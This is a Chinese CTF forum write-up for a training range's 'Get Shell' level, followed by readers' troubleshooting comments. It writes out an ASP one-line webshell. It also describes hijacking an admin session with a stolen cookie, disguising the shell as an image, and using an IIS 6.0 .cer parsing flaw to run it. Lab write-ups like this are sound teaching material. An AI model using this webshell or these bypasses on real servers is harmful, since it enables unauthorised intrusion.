靶场第五关解题思路--Get Shell! — 绕过防护上传木马
PPT、课件已打包至附件!
直播回放观看:https://ke.qq.com/webcourse/index.html#course_id=275794&term_id=100326238&taid=2183187711407442&vid=f1425nhgbnh
看了题目和Tips,这题是需要我们用上一题窃取的cookie来登录后台然后上传WEBSHELL,然后连接菜刀获取flag。
先找到上一题打来的cookie。
ADMINSESSIONIDCSTRCSDQ=LBMLMBCCNPFINOANFGLPCFBC
然后按F12选择Application,然后看右边有一个cookies然后选择我们的题目的地址,然后点击空白的地方,
把ADMINSESSIONIDCSTRCSDQ粘贴在Name下LBMLMBCCNPFINOANFGLPCFBC粘贴在value
(浏览器可能会有差异,我是谷歌浏览器,不懂可以百度下非常简单)
然后点准备好了吗或者F5刷新页面,成功进入
然后我们直接找上传点,毕竟getshell我们是需要在服务器的WWW文件夹里面放一段恶意代码的。
我们先去百度找ASP一句话木马,因为是ASP的环境
ASP一句话木马:<%eval request ("pass")%> 密码是pass eval是个函数,request是接受参数的。有兴趣了解一句话的可以自行百度或者私聊我。
一般而言直接传木马文件都很可能被拦截,所以一般而言一句话木马都会做成图片马。图片马制作非常简单,一条CMD命令就可以了
具体的可以去http://bbs.zkaq.cn/?t/159.html 查看 然后我们成功的得到了图片马
找到上传点
我们修改产品管理里面的产品
文件存在然后上菜刀。菜刀打开右键添加,地址就写文件地址,边上的框框写密码,我的就是pass,记得选择脚本格式
然后我们双击去访问,丢了一个405报错。这是因为jpg文件不解析,因为你的后缀是图片格式,所以服务器会当做一张图片去读取,而不是代码。
就和你把一个图片后缀改为TXT然后打开里面的东西都会当文本读取而不是图片。
报错信息里面写了iis6.0的中间件。百度下iis6.0的解析漏洞,就能发现上传cer文件,iis6.0会解且执行。
然后把图片马名字改为cer上传,成功上传,然后菜刀连接,成功进入,然后滚轮划一下就能看到flag!.txt,然后双击打开就是flag了。
打赏我,让我更有动力~
返回首页
CTF&WP专版
gin
发表于 2019-5-10
为什么我的cookie改了之后刷新没有反应啊,我也是谷歌
评论列表
加载数据中...
undefined_object
发表于 2019-5-20
为嘛是flag错误?求解答
评论列表
加载数据中...
般若
发表于 2019-8-22
查出的flag是错误的?
评论列表
加载数据中...
mxh81862469
发表于 2020-1-16
评论列表
加载数据中...
phant0m
发表于 2020-3-7
评论列表
加载数据中...
codegod
发表于 2020-3-25
社区 个人中心里 其中 修改图片 可不可 上传木马
评论列表
加载数据中...
qqq121027
发表于 2020-9-11
#### 空的,是被人删了么?
评论列表
加载数据中...
和谐文明
发表于 2020-9-15
不知道咋回事 F5刷新页面不变!果断退出在登录靶场,直接看到登录页面???喵喵
评论列表
加载数据中...
菜包子
发表于 2020-12-24
我改了cookie
为什么里面点击产品管理没反应?
评论列表
加载数据中...
nemo
发表于 2021-3-22
为什么我尝试打开flag.txt会报没有权限
评论列表
加载数据中...
忍荷
发表于 2021-11-16
点击E盘,报操作完成,但有错误发生了。
评论列表
加载数据中...
zhan
发表于 2022-4-4
用菜刀连上后只有D盘,为什么没有C盘
评论列表
加载数据中...
zhan
发表于 2022-4-4
用菜刀连上后只有D盘,为什么没有C盘
评论列表
加载数据中...
zhan
发表于 2022-4-4
用菜刀连上后只有D盘,为什么没有C盘
评论列表
加载数据中...
wangtao
发表于 2022-5-8
刷新了还是进去不,是什么问题呢
评论列表
加载数据中...
wangtao
发表于 2022-5-8
刷新了还是进不去,是什么问题呢
评论列表
加载数据中...